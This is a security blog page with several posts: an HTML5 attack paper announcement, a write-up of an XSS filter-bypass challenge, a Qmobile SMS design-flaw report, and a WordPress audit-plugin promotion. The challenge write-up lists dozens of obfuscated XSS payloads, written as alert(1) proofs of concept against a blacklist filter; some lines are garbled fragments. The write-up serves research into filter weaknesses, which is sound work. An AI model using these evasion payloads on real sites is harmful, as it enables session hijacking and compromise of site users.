Latest News

HTML5 Modern Day Attack And Defence Vectors

Lately, A lot of people have been asking me the reason of my absence and not being active on RHA. The answer is that there are countless factors to which I have lost count myself. Had it been one, I might have remembered it. First of all i was very busy with my studies and also I had been working on my final year project because its right around the corner. All this work had been consuming a lot if my time and then came the task of promoting my upcoming book "Ethical Hacking and Penetration Testing Guide" which took about 10 months of time period to write. Along with it, i have been exploring new horizons with Web Application Firewalls and working on a tool to automatically bypass blacklist based WAF.

From a research point of view, I spent last four months researching on attack vectors with HTML5 and documented them in an easy to understand manner as a part of my semester project. However, i made several modifications later on to match the standards so that I could publish it on my blog.

IT has been more than six years since the advent of HTML5 (dated back 2008), and as the time has passed by we have seen more and more websites utilizing HTML5 features and have witnessed that technologies like flash and silverlight are dying slowly.

However, each of the HTML5 features could bring security issues if not used correctly, one of the major security issues with HTML5 is DOM Based XSS due to the heavy use of javascript in HTML5 based applications which would obviously be the prime highlight of this paper.

 Being a firm believer of free education, here I present to you "HTML5 Modern Day Attack And Defence Vectors" free of cost and free of ads. Last but not least, I would like to sincerely thank "lavakumar kuppan" for his tremendous help and without him the quality of the paper would have been compromised. I hope you find it helpful.

You can download the paper by clicking the "DOWNLOAD" button below:

What's next? 

I also spent some time in researching previously unknown vulnerabilities with Mobile browsers and applications. As soon as they are fixed, I would be disclosing couple of ZERO day vulnerabilities in various apps, browsers etc which i found during my encounter with Qmobile Noir A20 which uses a customized version of Android OS. So Stay Tuned.  


6/29/2014 - Fixed spelling mistakes and references.  
7/7/2014 - Fixed more spelling and code formatting mistakes

Rhainfosec XSS Challenge 2 - Writeup

Last week, we announced our second XSS challenge after the tremendous success of our first XSS challenge. The challenge was based upon a blacklist based protection and the goal was to execute javascript alert(1). We had a huge number of participants for the challenge and in total we had more than 15k attempts for breaking the XSS filter. Out of which only 15 were worthy enough to break it.

Challenge Setup

The following were some of the specifications for the challenge: 

  • We blacklisted alert, prompt, confirm, document.write functions which are most commonly used to execute javascript. 
  • We blacklisted open & closed parenthesis, which is what most of the XSS vectors require. 
  • We blacklisted source keyword to avoid an easy bypass. 
  • We also blacklisted common DOM elements to reference the window such as this, top, window, self, parent (Later whitelisted) etc. 
  • As per the rules, we specified that we would update the blacklist as soon as the challengers manage to find other ways to reference window and also for challengers to find new ways to reference window global variable. 
  • PHP htmlspecialchars() function was used, so it was impossible to escape out of attribute as double quote was encoded. 
  • The winners would be decided based upon the amount of unique vectors. 


We gave two interesting hints for the challenge: 

  • "Use your parent to get to the top". We were referring to "Parent" or "ParentNode" which could be used as an alternative for window object. 
  • "parentNode" - Upon realizing that people are still not able to solve the challenge, we released another important hint, where we actually revealed the name of the object.  


At first, We received some ridiculously long solutions, however it was matter of time, when the participants were able to shorten it up and came up with our expected solution. With that being said, Let's now take a look at our expected solution: onerror=parentNode['inne'%2B'rHTML']=URL#<img src=x onerror=alert(1)>
The solution was pretty simple, We simply used parentNode to reference the innerHTML property, if you notice that we have used %2B which is equivalent to + sign, we had to use it's encoded version since '+' sign was encoded, since  and set it equal to the URL. Which is equivalent to document.url.

Next, all we had to do is to enter our vector after the hash sign and since, anything after the hash would not be sent to the server, we would be able to inject the vector of our choice. However, this solution would not work in firefox, since firefox encodes opening and closing brackets (<, >) passed after hash when source is set to document.url.


Mastao kinugawa and Pepe vila came up with equal number of unique solution therefore they both are the conqueror of this challenge and are crowned as winners. Both of them kept coming with exceptional bypasses, till the point where further blacklisting was not possible without actually breaking the challenge. 

I would like to congratulate both of them and would like to thank them and all of other participants for taking out their precious time and participating in this challenge. 

Challenge Link

We have already setup the challenge on for you to be able to validate it. Special thanks to Giuseppe Trotta for hosting the challenge at

Solutions From Community

Let's now take a look at the solutions from community, the list is in descending order with an exception to Masato and Pepe vila as they have equal number of solutions. 

1. Masato Kinugawa

Solution#1'x'onerror=head['innerHTM'%2B'L']=URL#<img src=x onerror=alert(1)>

Solution#2[0][%27innerH%27%2B%27TML%27]=URL#<img src=x onerror=alert(1)>

Solution#3[%27innerH%27%2B%27TML%27]=URL#<img src=x onerror=alert(1)>

Solution#4[%27innerH%27%2B%27TML%27]=URL#<img src=x onerror=alert(1)>

Solution#5['documen'%2B't']['bod'%2B'y']['innerHTM'%2B'L']=URL#<img src=x onerror=alert(1)>

(IE only):['documen'%2B't']['bod'%2B'y']['innerHTM'%2B'L']=URL#<img src=x onerror=alert(1)>

Safari only:
( Please click the go button. FYI, document.domain='com' vector no longer works on Chrome.)

Firefox only:'x'onerror=content['documen'%2B't']['bod'%2B'y']['innerHTM'%2B'L']=content['documen'%2B't']['locatio'%2B'n']['has'%2B'h']#<img src=x onerror=alert(1)>

function go(){"javascript:alert(1)""
<button onclick=go()>go</button>

It works on both Firefox and IE:'x'id='a'onerror=a['ownerD'%2B'ocument']['bod'%2B'y']['innerHTM'%2B'L']=a['ownerD'%2B'ocument']['locatio'%2B'n']['has'%2B'h']#<img src=x onerror=alert(1)>





or if you blacklist "target" it's stil possible to use "srcElement" or





Solution#9["innerHTM"%2b"L"]=URL%27onerror=a={};a[src="logo.png"]=a=activeElement#<img/src=x onerror=alert(1)>


3. Mathias


<body onload="location='*/alert(1)';">Click me</body>

var x ='["loc"%2b"ation"]="javascri"%2b"pt:/*"%2

["innerHTM"%2b"L"]=event.view["locatio"%2b"n"]["has"%2b"h"]'#<img src=x onerror=alert(1)>

location="'vbs:setTimeout %22setTimeout windo%22%26%22w.nam%22%26%22e%22'"

2Bnavigator.userAgent[12]%2B1%2Bnavigator.userAgent[27];", "_self");

4. Masahiro YAMADA

Update: Masahiro YAMADA has done a detailed writeup of his solutions here.  

if ("") {
location.href = location.href + "?x=<"+"img src=. onerror=alert(1)>";

<a href=';["par"%2B"entE"%2B"lement"]["innerHTM"%2B"L]["par"%2B"entE"%2B"lement"]["par"%2B"entE"%2B"lement"]["ownerD"%2B"ocument"].referrer&#x27;' target="_blank">go</a>

function goXss() {
var w =;"<"+"img src=. onerror=alert(1)>";

["innerHTM"%2B"L"];lt=o[11];gt=o[o.length-1];e["innerHTM"%2B"L"]=lt%2B"img src=. onerror=al"%2B"ert%26%23x28;1%26%23x29;"%2Bgt'

5. Luat Nguyen

Solution #1:
?xss='1' id=xxx['outerHTM'%2b'L']=parent['locatio'%2b'n']['has'%2b'h'] #<svg onload=alert(1)>

Solution #2:
?xss='1' id=xxx abc='aler%26%23x74%26%23x28%201%26%23x29' onload=1 onerror=xxx['innerHTM'%2b'L']=xxx['attribut'%2b'es']['abc']['valu'%2b'e'];xxx['attribut'%2b'es']['onload']['valu'%2b'e']=xxx['innerHTM'%2b'L'];xxx.src='logo'
(is not using location.hash)

6. file descriptor



7. Roman Shafigullin

for Chrome[onerror%2B%27%27][0];attributes[1].value=%27aler%27%2B%27t%27%2Bv[16]%2B1%2Bv[22];src=2

for firefox'x' onerror=v=[onerror%2B''][0];attributes[0].value='aler'%2B't'%2Bv[16]%2B1%2Bv[38];src=2

8. Ahmed Nafeez

Bnavigator.userAgent[12]%2B1%2Bnavigator.userAgent[36];", "_self");

p%27%2B%27t:aler%27%2B%27t%27%2Bopener[l].search[6]%2B1%2Bopener[l].search[6]", "_self");

9. Frans Rosen

Solution#1[%27innerHT%27%2b%27ML%27]=URL#<img src=x onerror=alert(1)>

10. Denis Kolegov

<script>"'locatio'%2b'n';parent[c]=parent['n'%2b'ame']", "javascript:alert(1)");

11. topol

Solution#1 onerror=parentNode['innerH'%2b'TML']=parent['loca'%2b'tion']['ha'%2b'sh']#<img src=a onerror=alert(1)>

12. romain <>

Solution#1[%27documen%27%2b%27t%27][%27bod%27%2b%27y%27][%27innerHTM%27%2b%27L%27]=%27%27%2bparent[%27locatio%27%2b%27n%27][%27has%27%2b%27h%27]#<img src=. onerror=alert(1) >

13. Giuseppe Trotta


14. Alan Bishop <>

<a href="
22%5d%27#<img src=x onerror='alert(1)'>">click me</a>
POC link -

15. Mramydnei" mramydnei"

Vector:<svg onload=alert(1)>
a onerror=parentNode['outerH'+'TML']=referrer


The challenge was based upon a very strict blacklist rules, however the bypasses prove yet again that "Blacklists" have never been and never would be the solution for mitigating cross site scripting attacks. In case, if I have missed any of your submission, Please let me know, I would update it accordingly.

Last but not least, I would like to Sincerely thank "Prakhar Prasad" for hosting the challenge, "Alex Infuhr" with ideas to make the challenge more interesting and "Giuseppe Trotta" for hosting the challenge on

I would love to hear your feedback! Pass your comments. Cheers. 

A Simple Design Flaw In Qmobile's Messaging System


This post describes a simple design flaw inside of Qmobile handsets and describes why you shouldn't rely upon built in password protection mechanisms and why encryption is the best solution rather than using password protection mechanism.
The testing was carried out on Qmobile Noir A20. The problem lies in the fact that even after the password protection of the messages, other applications which have the READ_SMS permission, could read the SMS in clear text (defeating the purpose of password in this case) .

Qmobile based on a customized version of Android OS for the smartphones, has its own messaging app with an additional functionality of password protecting the messages, thus preventing it from unauthorized access.

Google Hangout

Google hangout is a very popular android app used by millions of users for sending/receiving messages and it's most likely to be present in every android phone. As discussed before, Qmobile messaging app allows users to password protect the messages. However, the problem is that this doesn't prevent Google hangout or any other app (that has read access to messages) to read the messages. The Qmobile messaging app does not encrypt the messages.


The following video demonstrates the issue:

Since, Mobile security has never been my area of research, i asked one of my friends "Francesco Stillavato" for his opinion on this issue. For those of you who don't know, Francesco is the author of the "Mobile Appication And Penetration Testing Course" at take a look at his opinion:

I agree with you: the application password protection isn't enough if you really want to protect your data (SMS in this case). There are many things to consider when implementing this type of security mechanism: for example, if the app stores its data in the memory card (not encrypted), almost every application would be able to read them. It's still important to note that in this case, during the installation process, Hangout requires permission to read SMS; so if you accept and install it, you are granting permission to the app.

While this may seem obvious, you should consider that if someone is able to physically access your device (open the play store and install an application), the application password protection may fails! So if you really want to protect your app data, you should consider to implement encryption (maybe using a master password) or store data in its own sandbox (like the SMS app) without allowing other app to ask for read permissions.

Here is what a world renowned android security expert and the CEO of Attity "Aditiya Gupta" has to say pertaining this issue:

QMobile should ensure that rather than giving a false sense of security to the users with a password protection of the messaging app (which could be easily bypassed), should also encrypt the messages while storing on the device if a user opts in for the password based security

If you have any questions or opinions, feel free to ask.

RHAinfoSec XSS Challenge - 2

Update: The results are announced here.

Welcome readers,

After a tremendous response with our first XSS challenge, we decided to make your lives a bit harder this summer by launching another XSS challenge. Like always, our challenges always challenging and based upon real world scenarios and the key to solving it mostly rely upon the ability to think outside the box.  
The challenge is based upon a a strong blacklist based protection, beware that the challenge may be very hard for you unless you don't understand the right injection context.   

    Challenge Rules/Goals

    • The challenge goal is to execute alert(1) inside the browser.
    • Your payload must render javascript inside modern browsers. 
    • The XSS protection header has been set to 0, which would turn off your client side XSS filter. 

    Challenge Link

    Special thanks to Mr Prakhar Prasad, for deploying the challenge. Alex Infuhr for beta testing and ideas with the challenge.  


    • If all you can do is "><img src=x onerror=prompt(1);>, then our humble apologies this challenge is not for you. 
    • The WAF can be very hard, if you don't know how to properly reverse engineer filter rules. 
    • You could refer to my "XSS Filter evasion Cheat sheet" for ideas on cracking this challenge.
    • Automated scanners won't help here as often time they fail at producing context based payloads. 


    Sumbit your vector to or, or you could DM on my twitter @rafaybalochonce you have cracked this challenge.

    Hardening Wordpress Security By Monitoring Malicious User Activities

    WordPress has become the most popular content management system; it drives more than 20% of the websites on the internet. Such popularity has also made WordPress a very popular hacker target, and as a matter of fact one can find ample of information about WordPress security. But although there is a lot of information about WordPress security, the WordPress security community is missing out something very important; WordPress monitoring and logging!

    Why Logging and Monitoring is Important

    Operating systems, network hardware and software have got log everything that is happening in a lo file or some sort of auditing database. For example Windows has the Event Viewer and Linux / Unix operating systems use syslog.

    From time to time administrators analyse logs to ensure that everything is working properly and that everyone is playing by the rules, i.e. not trying to tamper the system. In fact Analysing logs helps administrators identify any suspicious behaviour, hence preventing malicious attacks.

    Even in case of an attack, logs come in handy. For example if a website or server is hacked, administrators analyse the logs to track back the attack and identify the security hole the malicious hacker exploited to hack the website or server. Once the security hole has been identified administrators can work with the development team or vendor to close down the security hole to ensure that it cannot be exploited again in the future.

    Management also find logs very handy because it allows them to track and monitory user activity and productivity. Monitoring of system and user activity is a must to ensure both user productivity and the security of the system.

    Monitor WordPress Sites Activity

    Like with any other system, keeping an audit log of the activity WordPress sites and blogs, especially WordPress multisite installations is a must if you want to ensure the security of WordPress, and also user productivity.

    WP Security Audit Log

    WP Security Audit Log is a free WordPress monitoring plugin that tracks all activity on WordPress and WordPress multisite websites thus enabling administrators and WordPress owners keep track of all that is happening on their WordPress to identify any suspicious behaviour and prevent malicious hack attacks.

    WP Security Audit Log logs an alert each time a user logs in or out and creates, modifies or deletes existing content such as blog posts, pages and custom post types. What makes WP Security Audit Log better than other monitoring and auditing plugin are its comprehensive WordPress alerts. For example if some content is changed it does not simply issue a generic “content has been modified” alert, but specifically reports what has changed. For example it raises a different alert if a URL or category has changed, if the blog status or visibility has changed, if the author, date, page template or parent has changed and much more.

    Apart from content activity it also monitors the WordPress installation and system. Below is a list of some of the activity that WP Security Audit Log monitors:

    • User profile changes; such as email, role and password changes
    • Widgets changes; for example an alert is generated if new widget is created, existing widgets are moved, modified or deleted
    • Plugin changes; an alert is generated if a new plugin is installed or if an existing one has been updated or uninstalled
    • Themes monitoring; new theme is installed or activated
    • WordPress system changes; WP Security Audit Log also monitors WordPress updates, permalinks changes, administrator notification email change, default user role etc
    • Source code changes; an alert is raised if plugin or theme files is modified

    Administrators can use the Audit Log Viewer, shown in the below screenshot to view all the WordPress security alerts generated by the plugin while monitoring WordPress.

    Detailed WordPress Alerts

    As per the below screenshot each WordPress alert generated by the plugin includes information about the actual change being reported, the user’s WordPress username, avatar and role, the source IP, the date and time.

    It is also possible to enable the Data Inspector from the plugin’s settings to get more details about the reported alert, such as the file triggering the alert, the user’s User Agent string etc.

    From the plugin settings administrators can also enable PHP alerts, so the plugin reports any PHP errors and warnings therefore enabling administrators to also keep track of any PHP problems, typically created when a WordPress website is hacked.

    It is also possible to disable any of the alerts, if for example you do not want to be alerted each time a user logs in or out, as seen in the below screenshot.

    Delegation of WordPress Security Monitoring

    By default only administrators can view the alerts, switch on or off alerts, modify alerts pruning etc. Though it is also possible to allow specific users or roles to view the alerts or modify any of the plugin settings as seen from the below screenshot.

    WordPress Administrators Should Use WP Security Audit Log

    It is impossible to track user activity and productivity, and to ensure the security of your WordPress unless you have WP Security Audit Log; therefore such plugin come in very handy especially if you have hundreds of users on your WordPress, or if you have multiple websites and a large number of users on a WordPress multisite installation.

    Download WP Security Audit Log from the Official WordPress plugin repository and visit the official WP Security audit Log plugin page for more information about the plugin.

    Contact Us

    24x7 online , we happy to answer you , ,
    skype: greeenchip


    This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.

    Featured Post

    Custom Domains And HTTPS Redirection Code